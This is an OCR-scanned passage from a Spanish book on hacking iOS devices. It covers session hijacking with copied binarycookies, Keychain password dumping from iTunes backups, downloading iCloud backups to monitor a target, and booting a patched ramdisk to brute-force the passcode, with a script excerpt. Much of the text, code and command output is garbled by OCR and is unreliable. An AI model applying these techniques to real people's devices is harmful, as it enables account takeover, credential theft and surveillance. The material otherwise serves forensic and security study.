se pueden utilizar con un navegador web de un escritorio. En otras, la aplicación utilizará un servicio 


web del que hay que conocer las peticiones. por lo que lo más sencillo es copiar las binarycookies 
directamente a la misma aplicación de otro ¿Phone y utilizarlo. 


Irontght:-8 python ninoryronktencader py renkies hinaryeooktes 
A A A A AAA 


BinarycookieReader: developed by Satíshb3: http://wew.securitylesrn.net # | 


Utma=146477868.1971649992.1345763183.1352724013.1354988022.19; do. 
es-fr2, 28 Mov 2014; 
_VUMD=150477868.4. 19. 1354984022: donain=.perrinter.es; path=/: exp 
res=hied, Z8 Nov 2012; 
UIMk=1355008940994..AMJTCWSLaMarbWwOr ZXhOCCOJdG7PbNALZ3IhbA== 0.0.0) 
.2.1354088843715; domain=.perrinter.es; path=/; expires=Thu, 28 N 


utm1=139. AWI raW32bkhecbWNrin02aw1AZW30B3H=. 
donato-.perrinter.es; path=/; expires=Thu, 28 Nov 28 


; domaln-.perrimer.es; path-/: expires=Fri. 28 Dec 2912: 
> eZk=I16Z4I42DA1QĦT5Q1345763185876; denain=.perrinter-es; path=/; 
Ipires=Hon, 17 Aug 2837; f 
: Ccereheso; domaineaovil perrinter es; path=/; expires=Sun, 22 Nav 2i 


Imagen 04.16: Conversi 


de cookies con £inaryCookieReader 
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Con la extensión CookieyManager=Hpara el navegador Firefox es muy sencillo modificar y añadir 
nuevas entradas a partir de los datos obtenidos de una binarycookie. El objetivo de este análisis es 
llegar a acceder a sitios restringidos en los que la sesión sea válida, como podrian llegar a ser el 
correo electrónico, redes sociales, almacenamiento en la nube, mensajería instantánea, etcétera. 


Es especialmente interesante el correo personal, ya que una vez que se acceda a él, el resto de 
usuarios y contraseñas se obtendrán utilizando los procesos de “reinicio de contraseña”, 


¡AA AA 


F 


Imagen 04.17: Edición de cookies con extensión Cookies Manager—. 


Para que la suplantación sea eficaz, se ha de considerar que estas sesiones son válidas para los sitios 
especialmente diseñados para móviles. Lo que quiere decir que, por ejemplo, es posible que una 
cookie sea correcta para la web “m.Facebook.com”, pero no para “wwn./vacebook.com”. En estos 
casos, se deberá modificar también el User-Agent del navegador. para que redireccione al sitio web 
correcto. 


Casos famosos de binarycookies que se encuentran en un terminal y que pueden ser utilizadas en 
otros terminales sin problemas son los de Linkedin para ¡OS o Dropbox, permitiendo que si se tienen 
esos ficheros del backup, baste con copiarlos y acceder a la cuenta del dueño del backup. 


Capitulo IV. Atacando el backup | 87 | 


BR leo Men Lage E 
E Nev roióa Dafa 4 co Up Lera | E Copy Fom Pe l Copy To pe | dE naat Apt AppFasthi™ | O Search Fies | II: 
Í FleVicw | Dit 


cn A 


Imagen 04,18: BinaryCookies de Linkedin. 


Análisis del Keychain 
El Keychain es un Eichero contenedor seguro, citrado con un algoritmo AFS 128bits, que que es usado) 
EMOS por múltiples aplicaciones para guardar contraseñas, certificados digitales, claves privadas, 

era.¿De esta forma, cada aplicación del sistema, tan solo accede a sus propias contraseñas 
usando los métodos sec/temádd, secliembelete, seclremCopyMatching y seciremUpdate, evitando 
que las aplicaciones almacenen la información de formas menos seguras (como en un fichero Plisi). 


Otra caracteristica del Keychain es el uso de clases según el dato que se quiera almacenar. Existen 
£inco distintas: kSecClassGenericPassword para contraseñas genéricas, kSecCiassinternerPassword 
para contraseñas de Internet, ¿SecClass Certificate para certificados, kSecClassKey para llaves y 
KksSecClassIdentity para identidades digitales (certificados con claves). 


Para cifrar la información del Keychain se utiliza una clave única por dispositivo, esta clave (key 
10x835) no se puede exportar de tal forma que el contenedor no puede ser leído en otro terminal. EN y 
hivo de Keychain es una base de datos SO. ite que se encuentra situada dentro del terminal en la $ 
ita: ¿private/var/Keychains/Keyehain-2.cb y es guardado en el PC con Apple ¡Tunes cada vez que $ 

realiza una copia de seguridád. De esta copia almacenada en el directorio de backup no es posible 
“Obtener todos los datos, ya que tal y como se ha explicado anteriormente, es necesaria una clave que 
está únicamente en el dispositivo, pero sí es posible exportar bastante información. 


Usando la herramienta “keychanztoo/:py”4 incluida en los /Keripts de iPhone-dataprotectióR; s$ 
le generar un fichero CSV de contraseñas usando el parámetro p y especificando el archivo des 
hain y el Manifest. Pltst: 


rootobt: —iphone-da: 


rootabt:-/iphone-dataprotection/python_scriptsé pyLhon keychain_tool.py -p 
/ root /backup2/kcychain-backup.plist /root/backup2/Manifest-plist 

[If you have key835 for device 2e600cc8058be93dddcb37ccee6Bbe932aadfed; enle: 
r it (in hex) 


riting passwords to keychain.csv 
rootebt:-/iphone-dataprotection/python_scriptsé J 


igen 04.19: Volcado de Keychain con keychain_tool. 
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Dependiendo del número de aplicaciones que utilicen el Keychain en un terminal o del uso que el 
dueño del dispositivo le haya dado, podrán aparecer contraseñas de redes Wi-Fi, el PIN de la SIM, 
las claves de los correos electrónicos, las contraseñas de acceso a las VPN, etcétera. 


Para realizar este volcado de contraseñas existen más herramientas. La utilidad a 
AEREA Def ién incluye un módulo especial para revisar el contenido del Keychain 

lc un sistema de una forma mucho más visual y sencilla. En cl siguiente ejemplo se muestran las 
credenciales de una cuenta de correo que han sido extraídas del Keychain de un backup con la 
utilidad citada. 


[2012002370722572 
CLASS: 


7.El backup en Apple iCloud 


Con el nuevo servicio de Apple iCloud, para los usuarios de cualquier dispositivo ¡OS es posible 
almacenar las copias de seguridad del terminal completo en la nube de Apple, además de sincronizar 
otros datos como la agenda de contactos, las citas del calendario. las notas o las fotografías. 


Para poder acceder a esta información almacenada en el backup de Apple ¡Cloud es necesario 
conocer el nombre de usuario y la contraseña de la cuenta 4pple del dueño del terminal. Estas 
credenciales no se encuentran directamente en el Keychain de un backup de Apple iTunes, por lo 
que será necesario probar suerte con las usuarios y credenciales de aquellas cuentas que se hayan 
averiguado de otros servicios o utilizar un ataque directamente al terminal, haciendo un Jailbreak al 
dispositivo físico v introduciendo un malware dentro del sistema. 


En cualquier caso, una vez se tenga acceso a las credenciales de Apple iCloud, con otra de las 
características de la utilidad de Elcomsoft se podrán descargar copias de seguridad completas de 
otras fechas del dispositivo. Tan solo introduciendo los parámetros de autenticación, seleccionando 
la copia a volcar y el directorio de destino. 
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i2 arf DPad2,2] [5N: DQTG40U2DRG 1445] 

UDID: 2e600529fa92233dddcb37cc8180552c:803122005 
Updated: April, 30 2012 17:46; 3 snapshot(s) 

Size: 169.9 MB 


iaramosf [iPhone3, 1) [SN: B0040RDKNW] 
UDID: 419eb3136577339275514e9 180552ce2233dddcb 
Updated: December, 05 2012 23:47; 3 snapshot(s] 


Imagen 04.21 Selección de copias de seguridad. 


El contenido de Apple ¡Cloud se almacena directamente sin cifrar, por lo que el análisis consistirá en 
llevar a cabo las mismas tareas que una copia de Apple iTunes en la que no se estableció contraseña, 


Esto permitiría vigilar constantemente al objetivo, ya que cada vez que se generase una nueva copia 
de seguridad esta podría ser descargada directamente a nuestra máquina y analizarla. t t 


Capitulo Y. iPhone DataProtection EN 


Capítulo V 
iPhone DataProtection 


1. Introducción Ñ 


Para habilitar la protección de datos en un dispositivo iPhone es necesario configurar una palabra 
de paso o passcode, la cual es por defecto un código de tipo PIN. aunque como se ha visto puede 
ser mucho más compleja. Para configurarlo tan solo hay que habilitar esta caracteristica, la cual por 
defecto viene en el apartado “General” del dispositivo, tal y como se puede apreciar en la imagen 
siguiente: 


Imagen 05.01: Opciones de contraseña 


A partir de ¡OS 4 se cifra cada fichero creado con una clave aleatoria. Dicha clave se almacena a 
bajo nivel, y permite que desde el propio dispositivo. se pueda acceder al dato descifrado al vuelo. 
Esta caracteristica da soporte a funciones de borrado seguro de la información del teléfono yala 
protección a alto nivel contra ataques de fuerza brula de contraseña. 
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Mediante procedimientos forenses se obtiene una imagen bir a bir del disco de un dispositivo 
¡OS usando herramientas específicas. Prácticamente todos los datos residentes en el dispositivo 
se encontrarán cifrados, haciendo inútiles todo tipo de técnicas relativas a la recuperación de la 


información en tiempo útil. Sin embargo, al existir fallos en el BootROM explotables en el proceso 
de arranque, es posible conseguir que s 


herramientas de iPhone DataProtection acceder al sistema. 


a el propio ¿OS el que descifre el disco y mediante las 


tigación llevada a cabo por la empresa Sogeti, y de ellas 


se proporciona el código fuente libre y sin coste alguno. 


2. Montando iPhone DataProtection 


Ll proceso de instalación de las herramientas DataProtection es bastante sencillo de realizar. Para 


ello, solo se hace necesario la instalación de las siguientes dependencias: 


MUgersasilverhaciónip install constmcr pycrunto elcrenta progresshar. 
Requirenent already satisfied (as e to Construct in cowpythonZ2Mlibisite packas 


aNnnnatruct-2.fé-py2.7.egy 

i i —uparade to upgrade?! pycrypto in e:\pythan27\lib\aiee-package 
pythunZ/Alib\site-package. 
Python? 71b Ate=pack 


—upgrado to upgrade): n2crypto in e 


upgrade): 


—upgrade to progressbar in 


Imagen 05.02: Instalación de dependencias. 
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a vez que se tengan las dependencias, las herramientas de ¡Phone DataProtection podrán 


.Clonando un iPhone bit a bit con iPhone 
ataProtection 


s herramientas de DataProtection incorporan un sencillo script que permite que se pucda clonar 
a bit una partición de un dispositivo iOS. 


Nin 
[SSIIOPTS-"=> 2222 -oSLu ic Los LC=yChecking-no -oUserKnowmHostsFile-/dev/nul1" 


[nin ash fowt0215 rootfllocalhost "./device_inlus did" 


Jar [ "suoro" == "" J; then 
a 

lecho “Device woro : suzo" 
[dir -p umio 


[parE="date “xvit mear 
anisum uzanta FORTE. de 


lecho “Dumping coto partition in pami 


bah SSSHOPTS roctBlocalhost “dd 1=/cov/rásabimas! baita) || dd 1f2/dev/rdicheisisz 55-819" > SOUT 


iste script lec el contenido del sistema de ficheros de! dispositivo, y copia bit a dit todo el contenido 


una imagen de ti vez terminada la copia binaria, esta puede abrirse con la aplicación 


o el propio sistema de ficheros de OS Y. 


ars 


Hacking de dispositivos iOS: iPhone & iPad 


Debido a que la aplicación HFSExplorer no puede descifrar por sí misma el cı 
generada por las aplicaciones de DataProtection 


la imagen 


[[Teying to detect CEncryptedEncoding structure. . . 
[CEncryptedincoding structure not found. Proceeding... 

Trying to detect UDIF atruceure... 

[juoze srruernre not found. Proceeding.. 

[Poso 

[Volune cprerect major version : 2 => 105 4 

Volume Unique ID : 36a36a1142371f6b 

[Using plast rire 15% Pnoneldescifzadol36a36al1d£379165.planr 

[EXE key : Sba02celadb80S4674107750065328492014ba73e3cca2789d6191880059950 
0000000000000001000000280000001244bc475f4b4E3aeSbL2drB30809b 


4. Accediendo con HFS 


La única información que se encuentra parcialmente visible son los metadatos del sistema de ficheros. 
Pero toda la información relativa a un archivo u objeto del dispositivo, se encontrará cifrada en su 
interior. Una herramienta sencilla, intuitiva y de licencia GNU, es la herramienta HFS Explorer. 
Se puede descargar gratuitamente, y servirá para ilustrar un poco más esta característica de los 
dispositivos propiedad de Apple. En la siguiente captura, el lector podrá comprobar cómo se puede 
ver con claridad los metadatos del sistema de ficheros de un ¿Phone 4. Estos metadatos, son útiles 
para poder desenvolverse con soltura por el sistema de ficheros, e identificar con claridad todos y 
cada uno de ellos. 
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se desea extraer algún dato, HFS Explorer ofrece una opción interesante y fácil. A través del botón 
derecho del ratón, es posible extraer los datos directamente a un PC. 


[fmobie Medio OCT /IODAPPLES 
es Date Modified. 
empty 5/05/11 19:35 
folders 55/11 19:36 
keybags 505/11 19:56 
ib 5/05/11 13:35 
local 27/02/12 9:54 

$ bk 

Edi log 

S- ogs 

1- mobie 

| E- Applications Extract data and resource fork(s) 

ta Library E 

| E- Meda 

H E- de Books 

EEST 

TREs F 

11158 


Imagen 05.07: Extracción de datos en sistema de ficheros HFS. 


Una vez extraído el dato, si se edita el mismo con algún editor hexadecimal, se podrá comprobar 
ue el dato se encuentra ilegible, y por tanto, inútil desde un punto de vista malicioso o de forense 
ejemplo. 


Eset m) 
ETT 
20000019 
íiouunoz0 


ES 


20000030 ES 

20000040 30 

20060080 82 

a00co060 ar 

ovoeuuya © os 

ooocooac 50 20 

uunnanac mo ac 

coooooac z1 sc 

aovoconc DD aa ss 

cooococe EA 00 9a ci o2 cc 

'0090coDO 5 17 01 5F FE F4 CD 

ocoocora 12 BA BB 57 7c 19 

ocoocoro 30 CB FF FE 2E FD 

wisoo200 17 16 96 42 De cr 

oco00110 41 E4 1E 50 EO 89 2A 28 

00000120 BT /6 AB ED DD 4D AB AE R3Q'.utd-vaàiiet 
90000130 DC 12 30 22 ES EA AF AN 29 Jds.20.0"ErO. 
60000120 AD 70 74 FO 2E 50 Eé 1D ,8".=.cy"D08.P2. 
naunans0 BE SE FO SC S5 At et o3 

nocoor60 1E 28 ES B6 DS 51 28 fC 

nocoo179 EF 52 36 20 45 2C 86 EE 3M4 36 £0 rx 99 as 


Imagen 05.08: Datos extraídos y cifrados en sistema de ficheros IPS. 
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5. Sacando claves con iPhone DataProtection 


Actualmente, los dispositivos ¿OS vienen con la funcionalidad de cifrado-descifrado por hardware, 
lo que le confiere un procesador dedicado exclusivamente a esta tarea. Gracias a ello, se reduce 
notablemente el impacto de cifrado-descifrado en el sistema operativo embebido. 


En este procesador se encuentran embebidas dos claves. Una de las claves, es undlave UID, la cual 
Debido a que estos dispositivos son monousuario. esta clave AES será 


diferente para cada dispositiv: TOC: es una clave hardware, 
y llamada 


El proceso de cifrado consiste en cifrar cada fichero con una única clave. Esta clave, será una clave 
derivada de las claves almacenadas en cl procesador dedicado (UID más GID), más la clave que 
gencre el proceso o aplicación que necesite generar y/o modificar un fichero dentro del espacio del 
usuario. Estas llamadas, a su vez, se almacenan en un contenedor, el cual es llamado keybag. Este 
contenedor, (basado en software), a su vez, se encuentra protegido gracias a la palabra de paso o 
PIN, que se utiliza normalmente para desbloquear el dispositivo. 


Usualmente esta palabra de paso, suele ser un PIN de 4 dígitos. Un PIN de este tipo, es una contraseña 
fácilmente adivinable por técnicas simples basadas en tiempo, en fuerza bruta, en probabilidad y en 
entropía. 


A través de la probabilidad, y conociendo todos los estados posibles de un PIN, se puede medir la 
frecuencia con la que se obtiene un resultado especifico y útil. La entropía, a su vez, permito que se 
pueda medir la incertidumbre de una fuente de información. 


Para poder medir la fortaleza de una contraseña basada en un PTN de 4 digitos en un supuesto ataque 
por fuerza bruta, se pueden realizar cálculos computando la entropía de la información basándose en 
dos variables clave. Una de ellas será el número de posibles simbolos a escoger en una contraseña, 
y la otra variable será el número de símbolos en la contraseña. Para cllo, se puede utilizar la fórmula 
siguiente: 


Imagen 05.09: Fórmula para medir la fortaleza de una contraseña. 


Al aplicar a la fórmula basándose solo en una clave basada en PIN, el número de posibles símbolos 
(simbolos del 0 al 9), unido al número de símbolos en una contraseña de tipo PIN (4), se obtiene una 
entropía de 13.28. En pocas palabras, se necesitarían únicamente y como máximo 10.000 intentos 
(10* posibilidades) para poder averiguar la clave que daría acceso al keybag. 


Para dar mayor protección, los dispositivos ¡OS, llevan una protección por software, la cual impide 
que se puedan realizar ataques basados en fuerza bruta. Esta protección limita a 10 intentos el que 
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pueda introducir una clave errónea. Si se sobrepasa esta barrera, el dispositivo borrará las claves 
ernas necesarias para el cifrado/descifrado, y la información será irrecuperable. Yp 


bido a que la caracteristica de DataProrection se diseñó para proteger los datos frente a ataques 
tipo offline (ataques en donde se tienen los datos pero no el dispositivo físico), existen numerosas 
icas y herramientas que se basan en ellas que tralam de dar solución a esta problemática. 


reparando el entorno 


do un dispositivo ¿Phone se inicia, lo hace siguiendo una cadena de confianza, verificando 
iante un Aash cada fichero que carga durante el arranque. 


primera fase de arranque, se realiza a través del BoorROM, y se completa cargando todos los 
ificados raíz que seutilizarán para validar la firma de cada paquete que se instale en las siguientes 
de arranque. 


vez que arranca el BoofROM, este iniciará un cargador de arranque a bajo nivel (Low Level 
11). Al inicializarse este (una vez verificada su firma a través de los certificados raíz ), se pasará a la 
iente fase de arranque, la cual se iniciará con el iBoot. Uno de los cometidos de este cargador, es 
icar las firmas del Kernel, así como las diferentes aplicaciones de usuario. Si estas son correctas, 


sistema iniciará de manera correcta, y el dispositivo se encontrará en una fase de utilización por 
e de un usuario final. 


poder saltar la restricción de verificación del cargador de arranque ¿Boor más el sistema 
rativo, los dispositivos basados en ¿Phone disponen de un modo especifico para estas tareas. Lis 


modo D1'U o modo de actualización de Firmware (Device Firmware Upgrade). 


modo es utilizado principalmente para la actualización (o desactualización) del sistema 
tivo instalado. La comprobación de integridad de ficheros se correspondería, una vez iniciado 
dispositivo, con la siguiente imagen: 
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Antes de arrancar el dispositivo. es necesario generar una imagen de arranque con las herramientas 
necesarias para poder realizar el ataque con éxito. Para cllo, las herramientas de DaraProtection, 
incorporan un script llamado kernel_patcherpy. que está diseñado para realizar esta función. Este 
script necesita el fichero de claves utilizado por la aplicación RedSn0w para descifrar la Ramdisk 
y el kernel, así como una imagen válida de un dispositivo iPhone. El fichero de claves que utiliza 
RedSnOw se encuentra cn la propia aplicación, y la extracción es muy simple de realizar: 


Alverhacleseusl -k -0 -L hecpe://sitex-yvvyle.con/n/īphane nv .cnnof3103/honerredontw_nas_0.9.9h8 sis 


x Tutal x Mecedved z Mfard Average Gpced Time Tiw Time Current 
| Dinna upload Toral Spone 
hoo a73 e 273 o 158 Pi en 
A] 

ARO 
LlvevhackiSunsio redvuBu mac W Y.ybi-zin 
rohiy: rodonðw pac-ð.9-93; ziy 

as 


jy rodant;_ nao. 
PARLA copied. 


OS 


Los ticheros firmware de iOS se pueden descargar gratuitamente del sitio Web AA 
e vez generado el parche para la imagen descargada y construido una imagen de 


, es posible arrancar el dispositivo ¡Phone a través de la herramienta RedSu0w. 


Usage recen [i cto NEDI AI HIL olL al bermi beeste] 
d <an Er estos] fee <ol> TEKIS LU) teh 
use specified PSW 
Just erter pared DTU mode 
Just do tethered bout 
Gro Fie recovery loop 
Teich the curentiy metalled 5} 1SH bieb 
deviez has an old (net fared) bootrom 
ont activate an unaetivered device 
“h, —terperedBioctlogo=<st boot logo PNG Te for tetera bovis 
E imnekeche-est> use specie kemmeleache (advanced) 
TA devicetrces sati» ume specified devicelres [advancec) 
vt randsi estr ise specified ramndisk (advanced) 
a- bootArge=estro ¡se speulted kenel bootraras 
tadracicad) 
K nokemePalches don't pre-apply defeat set of kerne 
patches (advanced, 
-S ~-noSisbing donit stash fmpliedi ahon custom 
bunde is usec) advanced) 
-U —roUntetherilacis don't do narmal utether hacks 


Gmplied when custom bundle used} (advanced) 
ES 


hh how tri helo 
Imagen 05.13: Modificadores permitidos en RedSnúw. 
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Para poder explotar de manera eficiente las caracteristicas de las herramientas de DataProtection, 
se debe arrancar la aplicación RedSn(w (Herramicnta utilizada para realizar Jailbreak a dispositivos 
iPhone), con una scrie de modificadores. Estos modificadores son los siguientes: 


Nombre del parámetro Explicación | 
ipsw Utilizado para cargar una versión específica de fichero IPSW, 
--ramdisk Carga una imagen RAM especifica. 
--kernelcache Usa un fichero kernelcache especifico. 


TA DL oo en aq 


na vez arrancada la aplicación, se procedería de la misma mancra que si se fuese a realizarse un 
lailbreak a un dispositivo iPhone. 


- 2a S 
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Imagen 05.14: arranque de herramienta RedSnów: 


Una vez que el dispositivo se encuentra en funcionamiento, las características de red no se encuentran 
habilitadas por defecto. Para solucionar esta casuística, se pucden utilizar las capacidades de 
'multiplexado USB, las cuales proveen de conectividad TCP sobre USB. Lin este caso se podrá dar 
uso de conexiones SSH a través de este canal. 


ara cllo, las herramientas de DataProtection, 


Larvertackosrelay.bae 


Zilverhack:\e:\Python27>python.uxv Luprelay,py -t 22:2222 S9NA:RIAA 1999:1999 1234:1234 
Toruarding local port 222% Lu renute part 22 

Torwarding local port 5908 Lu remote part 5999 

Torvarding local port 1799 Lu enote part 1999 

'aruardins local purt 1234 Lu senote part 1234 
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Passcode 


El arrancar el dispositivo en modo DFU, posibilita que se puedan explotar vulnerabilidades en el 
propio dispositivo, como por ejemplo aquellas que permitan saltar la comprobación de firma de 
seguridad de ficheros. Esta posibilidad permite que se puedan cargar imágenes de arranque con las 
herramientas necesarias para poder realizar los ataques con éxito, saltando así la verificación de 
firmas. 


Una vez generada la imagen de arranque maliciosa e inyectada en memoria, esta posibilita que se 
puedan realizar otros ataques, como por ejemplo la fuerza bruta de credenciales. El ataque basado en 
la predicción de credenciales basada en fuerza bruta cs posible debido a dos factores: 


La protección por sollware, que elimina el contenido del dispositivo una vez sobrepasado 
el umbral de diez credenciales erróneas, y que no funciona a bajo nivel. 


-La fuerza bruta, que se realiza utilizando cl procesador del propio dispositivo. 


Para ello, las herramientas de DataProtection permiten que se realicen ataques basados en fuerza 
bruta basada en PIN o en credenciales más robustas. 


pı rong passcode, trying to bruteforce 
if checkPasscodecomplexity(elient) — 0 
peint r podog all d-digite passcodes. 
f ¡Ent bruteforcekeying (sy Lenbas! KkeyUagkeys”].data) 
1 
ci .update(hi } 
keybags [kbuuid]. updatecbf) 
print b? 
imt kb, untockwitaPasscodexey(bt .yet("passcodekey").decode("hex")) 
b. pr inič lasskeys O x 
di["classKeys"] = kb. getCleartlassKeysDict() 
di.save() 
ese: 
print "Complex passcode used, trying dictionary attack ...” 
imetfie = os.path.joinccurdir, wordlist-dicl") 
rv: 
wordlist = openídictfile, *r').readlinesO 
except (OSTrror, TOError), 
exitíe) 
far E ey a 
res = client. getPasscodekey(systenbag["KevBaakeys"]. data, line estripC'n" 
CELO uniockuthpasscodekeyires-get ( passcodekey ). decode( "hex" )): i 
print "Passeade Wi" OK" % line-rstriol in") 
di.update(res) 
keybags [kbuuid]. update(res) 
di. save) 
keychain_blob = client.domloadFile(”/nnt2/keychains/keychain 2- db") 
write file(Ckeychain-2.db", keychain_blob) 
print "Downloaded keychain database, use keychain tool.py to decrypt secrets” 


return 
print "Passcode not found!” 
retur 


Tmagen 05.16: Extracto de script de fuerza hruta de passcode. 


No hay que olvidar, que el éxito de este tipo de ataques se basa en la fortaleza de la credencial que 
tenga implementada el dispositivo. En el caso de una credencial basada en PIN (4 digitos), este 
ataque se realiza con éxito en un plazo máximo de unos 20 minutos. Para otro tipo de credenciales, 
el éxito dependerá del tipo de diccionario y de las iteraciones a la hora de probar credenciales. A 
continuación se muestra una tabla que estima el tiempo necesario en función del passcode: 
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Complejidad de la contraseña | Tiempo estimado 
4 digitos 20 minutos 

4 caracteres alfanuméricos 51 horas 

5 caracteres alfanuméricos 8 años 

8 caracteres alfanuméricos 13.000 años 


OSO Ein empos o rabos era Uea Y) 


En la siguiente captura de pantalla, se puede observar un alaque exitoso de fuerza bruta de contraseña 
utilizando esta técnica: 


denu_brutufurosi p: 
ALEI PAP Ian A 
¡bay SIGN uhecie OK 


Ep ojiin pytan soriptosdsats2 


Polae": 0, 'rangoaxcinun": 2> 
air PE s 
Pcegyaten 
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Del ravarnsc1sU63592cebaBS9EIMIARADSISN7A20c23414294a4 
AR0AA1 780 CTA2AE873/bebaYUSZLPAS 7SDBLA71MESI75cAcA0c27ea| 
ANTOTAP2A24C63ahae!23aDeG170646%4EV/296271800B00720M196) 
a3u8B9B71216042201cAhAMAch?S125c76AnScab46'/dHbiduëu 78 daaf| 
hler£S1F54a131wcdsoV1fc3ID2ALIA034d99762h991e445G8caci 
AhdO3FAS255AD1B12155Je2J6ceLo4fdo925755106501Rdba1274a5] 
DAcdBAO5 TK A7RAT9929h07304204207a83/M4L5vad8ASI4G0h! 24RA 
718 US ada AEO36800 FhhZaDAIAIO 401 4940ef9f1824F3FYSYZZhB2AS]| 
D10ADADEZeS 7H cudubuSclf9CbafA99NIGCIOITECII2I1 92610111 
CSA2ef4c£705cblecc 768TH UaFB7C2R42 Mahe dacIF4047eGr 7 


nn Seriot ydatapeoteut iunpython_soripeavifaf527] 
ASSUUL1GI83I9M4adR/362362110f J74 Gb. plis! 
Downloaded keychain database, use knyehain-tool.py to decrypt vuureto 


ilverhaciò 


Imagen 05,17: Atugue basado en fuerza bruta de contraseña 


Una vez que se pueda inyectar en el dispositivo una imagen de arranque maliciosa, la ventana 
de exposición aumenta de forma exponencial, en cuanto al número de ataques que posibilita esta 
técnica. 


KeyChain 


Con los datos anteriores se hace posible por ejemplo, atacar directamente a la base de datos keyChain, 
la cual es descargada automáticamente con el ataque anterior. Si el ataque a la base de datos keyChuin 
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es exitoso, se podrán obtener las credenciales de las principales aplicaciones y servicios que se 
gestionan desde el dispositivo. Estas credenciales atenderán por ejemplo al correo electrónico, la 
claves de acceso a una Wi-Fi, etcétera. Para realizar con éxilo este ataque, las herramientas de 
DataProtection, incorporan un seripl llamado 1 funcionamiento de este script es 
bastante sencillo, solicitando solo el lugar cn donde está la base de datos keyChain, y el fichero 
PLIST que contendrá las claves necesarias para poder descifrar el contenido de la base de datos, 


E AA | 
E E E 


<kaysBro05act 3eaßbct9f3d09/evoe13014</key> 


gyreyoaneyse/key> 

KEF UOONABERNRVITAMAABAAAAAJUKVUK AAAANAARAAKVVIJTEAAAA 
ESPNS gevur pm l NUM AAA Kb Ja uc 
Susie I JAMAI VARIKA PVA SUC TAJOWUPVXUKFQAAAABAAAAAPT 
QUNLAAAAFF VEJ Lu ZWUOME qUe: GESVRFUGAAAAAAMNQ 
VVVJRAMAABOUQKHMAINKI KRFR+ONS A ÍQOXBUWAAAAQAAAALVLIE 
RRA ADV IM MAAAC CASXLUSTENT IB TAES +SS ® DCR 7 BYQX 
POP LIL SAEXDZRIWVSVAMAAAQSYZNOZA ZS Š1V/ UZ TUŞZBNMQVMA 
MAAEMA I ASQVAMAAAC AMMAN 0061 anat 1/0 10yDOXr XHA 
Dn ver epp pas, Ti MEWE ZKL Zal DIA WSUOAVAQ/ KS 
Evan i xY J7 7F UPOVNANMEMMAACVÝSQYAARAAEAAAAAI ÓQ 
A CR 
ION SONA AAAG? CASCO T RH nl gr? OSCIPOYRARME 
POr ÄSVAA ARA AAAAAVEQEIKAMAJOdNEDPV3ZÍqSQMORE ja. 
TENAKOQISAKRQDZC | ZarmkpYVU T EAMAAEANKTXE ZQ | OBUP 
Ana en EAMAN ed 


PI pESOrFhue/h7m 
EE TZAMAAK JowO Jke JAS bo KOL KEYS: 
UV jL AO PSEVTSLADAMAFNET / Jk /VF 19VSZUDODSI ELTER pE 
Ž/data> 

Teyopasscodec, 

SSU iny1234</5tr 1ng> 


Skey>passcodekeyc/key- 
A | 


LR 
Imagen 05.18: Extracto de fichero PLIST con claves para descifrar la base de datos keyChain. 


Este script viene implementado para extraer elementos tan interesantes como las contraseñas 
utilizadas en aplicaciones de Internet, o extraer únicamente el almacén de certificados. 


C:xIPhonowdescifradoswurivtedpython keychain_ton7-py -d --skoychain-2.dh ..N36436a11d£37416h.plist 
loyhag: SIGN uhwuh OK 

toybag unluukwd with passcode key 

eychain vurulon = 4 


vush.apple-con 


Shinary data) : a9r69obü1BVaMhöebS@aGABAGSEScJo6dkSn1Sc851e3660AF3Ivf FOUOVA2As 
m 


mair 
UnKo2 DCER192:umbs IMA PARCME:2517 


ServicioTecntco_2811 
<WT-E430N0_Stecnico «2U11</UL-F i) 


Imagen 05.19: Visualización por puntalla de elementos en la base de datos keyChein. 
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En el caso de que se deseen visualizar por pantalla los elementos principales que se encuentran en 
la base de datos, el script viene preparado con un parámetro especifico para esta tarea unitaria, tal y 
como se puede ver en la anterior imagen. 


aché en Safari 


o vector de ataque se puede encontrar en la gestión que realiza la aplicación Safari de los 
Los y peticiones que realiza la aplicación cuando se navega a través de esta. Debido a que estas 
llicaciones necesitan optimizar al máximo el rendimiento para mejorar la experiencia del usuario, 
algunas ocasiones esta optimización perjudica aspectos como la seguridad de la información. 
| mayor ejemplo se encuentra en la gestión de datos que realiza la aplicación Safari de muchos 
los datos solicitados a través de ella. Para optimizar las peticiones así como los datos enviados 
recibidos, Safari gestiona una base de datos de caché en donde almacena información sobre la 
vegación de un usuario. Esta base de datos por defecto se encuentra en la siguiente ruta: 


estructura de la base de datos comprende campos con nombres tan interesantes como cache _ 
sponse v cache_receiver_data. La estructura completa es la siguiente: 


RENETARE diri cache actoma, veronica verao. 


RENE TAE cha ache sesporaeleniry JD INTEGER PR... 
IE PDA Er 

mem 

mem 

me 

var 


A) 


CREATE TAE cii cache cb detalentry ID INTEGRA. 


CREATE AE fal cache receives _datalenley ID INTEGE... 
er 


CRETE IOE request bey dex ON chri cade espor... 
CRENTE INDEX timestamp páre checa espose. 
EME DOBE sroto prope pex ON dhiri cache Heb Aat. 
TEATE NOOK readves „data adex ON chrl sache fese... 
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Navegando por la estructura çfurl_cache_receiver_data, se pueden encontrar desde hojas de estilo 
CSS, hasta scripts de verificación de usuario y contraseña. 


(Ener) Eoo] 
A meno eN KEN 514i m6185 58k = 1355553288 = IOD Aki -ESN Gic 2058 ¡var 
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nozve srt Er ~La drecaón de 
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calce om en pnl Epoca ar? SPT- <ul Lepe Vidier" rame PP 1803277 
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Loy arborea; 


RE 
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Imagen 05.21: Usuarios encontrados en base de dalos de cache de Safari. 


Ú Buscar con las palabras password o pwd subre esta base de datos, puede arrojar resultados 
interesantes a un atacante, debido principalmente, porque si a través de la aplicación Safari se han 
realizado peticiones de autenticación, es altamente probable que la aplicación haya almacenado 
tanto las peticiones, como las respuestas en esta base de datos. 
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Capítulo VI 
Análisis forense de datos de un terminal 
iOS con Oxygen Forensic Suite 


1. Introducción 


Tanto si se ha accedido a un backup de un terminal ¿Phone en el equipo donde está pareado el 
dis », como si se ha accedido al backup en Apple iCloud, o al propio terminal, es necesario 
analizar los datos. Como se ha visto en el capítulo de Captura y Análisis de un backup iOS, es posible 
extraer datos muy jugosos analizando las bases de datos SQLite, los ficheros de configuración en 
formato XML, Plist o Bplist, e incluso las Binary Cookies. 


Sin embargo, el volumen de datos es tan grande que un usuario puede estar varias semanas 
analizando los datos con scripts o manualmente. Es por ello que en el mercado existen herramientas 
profesionales que son capaces de analizar los gigabytes de datos que tiene un Smartphone para 
presentarlos de forma tápida y eficiente. Si el tiempo y la reducción de costes en proc: de análisis 
forenses son cruciales, el gasto de una licencia profesional es más que recomendable. En esta sección 
